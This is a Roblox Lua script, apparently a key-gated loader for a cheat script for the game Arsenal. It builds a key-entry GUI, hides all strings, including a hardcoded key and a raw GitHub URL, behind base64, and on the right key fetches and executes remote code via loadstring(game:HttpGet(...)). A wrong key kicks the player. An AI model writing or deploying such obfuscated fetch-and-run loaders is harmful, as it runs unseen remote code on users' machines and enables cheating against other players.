local function b64decode(data)
    local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    data = string.gsub(data, '[^'..b..'=]', '')
    return (data:gsub('.', function(x)
        if x == '=' then return '' end
        local r,f='',(b:find(x)-1)
        for i=6,1,-1 do r=r..(f%2^i - f%2^(i-1) > 0 and '1' or '0') end
        return r
    end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x)
        if #x ~= 8 then return '' end
        local c=0
        for i=1,8 do c=c + (x:sub(i,i) == '1' and 2^(8 - i) or 0) end
        return string.char(c)
    end))
end

local p,q=game:GetService(b64decode('UGxheWVycw==')),nil
q=p.LocalPlayer

local r=Instance.new(b64decode('U2NyZWVuR3Vp'),q:WaitForChild(b64decode('UGxheWVyR3Vp')))
r.Name=b64decode('S2V5TG9hZGVy')

local s=Instance.new(b64decode('RnJhbWU='),r)
s.Size=UDim2.new(0,300,0,150)
s.Position=UDim2.new(0.5,-150,0.5,-75)
s.BackgroundColor3=Color3.fromRGB(30,30,30)
s.BorderSizePixel=0

local t=Instance.new(b64decode('VGV4dEJveA=='),s)
t.Size=UDim2.new(0.8,0,0,40)
t.Position=UDim2.new(0.1,0,0.3,0)
t.PlaceholderText=b64decode('SW5ncmVzYSBsYSBrbGF2ZS4uLg==')
t.Font=Enum.Font.SourceSans
t.TextSize=18
t.TextColor3=Color3.new(1,1,1)
t.BackgroundColor3=Color3.fromRGB(50,50,50)
t.ClearTextOnFocus=false

local u=Instance.new(b64decode('VGV4dEJ1dHRvbg=='),s)
u.Size=UDim2.new(0.8,0,0,40)
u.Position=UDim2.new(0.1,0,0.65,0)
u.Text=b64decode('QWNjZWRlcg==')
u.Font=Enum.Font.SourceSansBold
u.TextSize=20
u.TextColor3=Color3.new(1,1,1)
u.BackgroundColor3=Color3.fromRGB(0,170,255)

local v=b64decode('TUFOZGtv')
local w=b64decode('aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL01hbmRhWC1PZmYvQXJzZW5hbFNjcmlwdC9tYWluL0Fyc2VuYWwlJTIwdjIuMQ==')

u.MouseButton1Click:Connect(function()
    if t.Text==v then
        r:Destroy()
        loadstring(game:HttpGet(w))()
    else
        q:Kick(b64decode('Q2xhdmUgaW5jb3JyZWN0YS4='))
    end
end)
